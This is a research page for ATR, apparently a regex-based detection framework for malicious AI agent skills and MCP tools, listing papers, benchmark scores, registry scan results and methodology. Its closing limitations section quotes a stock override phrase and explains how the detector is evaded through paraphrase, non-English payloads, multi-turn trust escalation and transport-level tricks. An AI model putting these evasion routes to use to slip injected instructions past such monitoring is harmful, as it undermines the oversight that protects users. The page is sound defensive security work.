Skip to content
Research

Data, benchmarks, and honest limitations.

ATR publishes evasion tests openly. We tell you what we can't catch.

April 2026 · 25 pages · 67 references
The Collapse of Trust: Security Architecture for the Age of Autonomous AI Agents

427 detection rules, RFC-001 quality standard, 96K ecosystem scan, 751 malware discovered, Cisco adoption. The complete ATR thesis with six research contributions.

NEWApril 2026
751 Malicious AI Agent Skills: The Largest AI Agent Malware Campaign Ever Documented

Discovered while scanning 96,096 skills across six registries. Three coordinated threat actors (hightower6eu 354, sakaen736jih 212, 52yuanchangxing 137). Reported to NousResearch and blacklisted.

April 2026 · 7 pages · 32 references
96,096 Skills, 751 Malware: A Large-Scale Security Audit of the AI Agent Ecosystem

The largest AI agent security scan to date. 96,096 skills across 6 registries, 1,302 flagged, 751 confirmed malware. Three coordinated threat actors. Credential access via tool descriptions accounts for 53% of detections.

NEWApril 2026 · 18 pages · 30 references
30 CVEs in 60 Days: The Model Context Protocol Attack Surface

Empirical analysis of the MCP attack surface. 30 CVEs in 60 days, 38% zero authentication, 7-class attack taxonomy, 53K ecosystem scan. 15x faster than Docker's first two years.

Benchmarks

Tested with our own corpus AND external benchmarks we've never seen before.

PINT (External, Adversarial)
99.7%
Precision
63.2%
Recall
77.3
F1
850 samples
Self-Test (Own Rules)
100%
Precision
89.4%
Recall
341
Samples

The gap between 99.7% precision and 63.2% recall is expected. Regex catches known patterns but misses paraphrases and multilingual attacks.

SKILL.md Detection Benchmark

Tested against 498 real-world OpenClaw SKILL.md files (32 malicious + 466 benign). Layer A = explicit malicious instructions. Layer C = obfuscated / hidden attacks.

Overall Performance
100%
Recall
97%
Precision
98.5
F1
0.2%
False positive rate
498
Real-world samples
By Attack Layer
Layer A100%
Explicit malicious instructions — 24/24 detected
Layer C100%
Obfuscated attacks — 8/8 detected
Benign1 FP
466 benign SKILL.md files — 1 false positive (0.20%)

Ecosystem Scan Data

Real scans of real MCP skill registries.

Ecosystem Scan (6 Registries)
96,096
skills scanned
989
CRITICAL
353
HIGH
1,302
Total flagged
ClawHub Registry Scan
36,394
skills crawled
182
CRITICAL
1,124
HIGH
9,676
With source code

Research Methodology

All research is reproducible. Datasets, scan scripts, and evaluation scripts are open-source under MIT license.

Scan coverage

Six registries totaling 96,096 skills. Largest subsets: OpenClaw 56,480, ClawHub 36,394, Skills.sh 3,115, plus three additional MCP / skill indexes. Each registry is crawled via public HTTP API or git repository.

Detection engine

All 427 rules execute deterministic regex / AST matching. No LLM inference. The same input produces the same detection result across environments — reproducibility is a prerequisite. Every rule is wild-validated against 36,394 ClawHub skills before publication.

Benchmarking

Precision / recall uses the external PINT dataset (850 samples) rather than self-generated tests — this avoids overfitting to our own test cases. A separate SKILL.md benchmark uses 498 real-world OpenClaw files, with malicious samples hand-labeled as ground truth.

False positive measurement

False positive rate is measured against real benign samples (skills vetted by manual or community review), divided by total detections. Every documented FP context is written into the rule YAML's false_positives field and surfaced on the rule page.

Reproducibility

Scan checkpoints, test sets, and evaluation scripts are public under data/ and tests/. Any researcher can rerun the scan with the same ATR version and obtain identical results.

External Citations

Academic papers and technical reports that cite ATR.

No external citations recorded yet. If your paper, technical report, or product documentation cites ATR, please let us know via GitHub issue.

Cite as: Lin, Kuan-Hsin (2026). The Collapse of Trust. DOI: 10.5281/zenodo.19178002

Upcoming Research

The next research frontiers for ATR. Progress is reflected in GitHub releases and paper updates.

Tier 3 Behavioral Evaluator
In progress

Extends detection from static regex to runtime behavioral signals. Initial rules: env variable access combined with network calls, tool-call rate anomalies, unexpected shell access.

Tier 4 Semantic Evaluator + Crystallization Pipeline
Design

Cases Tier 3 cannot decide escalate to LLM-as-judge semantic analysis. LLM findings crystallize into Tier 2 regex rules and flow back into ATR — the adaptive-to-innate immunity transition.

Sigma / YARA Cross-format Compatibility
Planned

Compile ATR rules into Sigma (SIEM-side) and YARA (file-side) formats so agent threat detection plugs into existing security pipelines without rebuilding infrastructure.

Training ↔ Runtime Detection Boundary
Open problem

ATR detects runtime attacks. Model backdoors planted during training are architecturally invisible at inference time. Bridging this gap requires new techniques combining supply-chain provenance (model cards, training data audits) with runtime behavioral fingerprinting.

Sources: ATR-FRAMEWORK-SPEC.md Phase 2-4 roadmap and the main paper's future work section.

What ATR Cannot Detect

We publish this section because honest limitations build more trust than false confidence.

Paraphrase Attacks

Any regex rule can be bypassed by semantically equivalent rephrasing. "Ignore previous instructions" is detected; "please set aside the guidance you were given earlier" is not.

Multi-Language Attacks

All patterns are English-only. Injection payloads in Spanish, Chinese, Arabic, or any other language bypass all rules completely.

Context-Dependent Attacks

"Delete all records" might be legitimate or malicious. Regex matches patterns without understanding authorization context.

Protocol-Level Attacks

ATR inspects content, not transport. Message replay, schema manipulation, MCP transport-level MITM are invisible.

Multi-Turn Behavioral Patterns

Gradual trust escalation across 20 turns, where no single message is detectable, is not correlated. ATR evaluates events independently.

Novel Attacks

By definition, regex cannot detect attack patterns that don't exist yet. New techniques require new rules.